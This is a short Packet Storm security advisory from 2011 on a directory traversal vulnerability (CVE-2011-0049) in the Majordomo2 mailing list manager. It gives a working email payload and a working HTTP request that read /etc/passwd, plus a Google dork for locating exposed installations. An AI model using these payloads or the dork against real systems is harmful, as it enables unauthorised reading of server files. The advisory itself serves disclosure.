Lucene search

K
packetstormMichael BrooksPACKETSTORM:98116
HistoryFeb 02, 2011 - 12:00 a.m.

Majordomo2 20110121 Directory Traversal

2011-02-0200:00:00
Michael Brooks
packetstormsecurity.com
35

EPSS

0.881

Percentile

98.7%

`Original Advisory: https://sitewat.ch/en/Advisory/View/1  
Credit: Michael Brooks (https://sitewat.ch)  
Vulnerability: Directory Traversal  
Software: Majordomo2  
Identifier:CVE-2011-0049  
Vendor: http://www.mj2.org/  
Affected Build: 20110121 and prior  
Download:  
http://ftp.mj2.org/pub/mj2/snapshots/2011-01/majordomo-20110121.tar.gz  
Google dork:inurl:mj_wwwusr  
  
Special thanks to Dave Miller, Reed Loden and the rest of the Mozilla  
security team for handling the issue.  
  
This vulnerability is exploitable via ALL of Majordomo2's interfaces.  
*Including  
e-mail*. Send an email to majordomo's mail interface (for example:  
[email protected]) with the body of the message as follows:  
help ../../../../../../../../../../../../../etc/passwd  
  
I'll give you one guess as to the contents of the response email ;).  
  
PoC for HTTP:  
http://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd  
`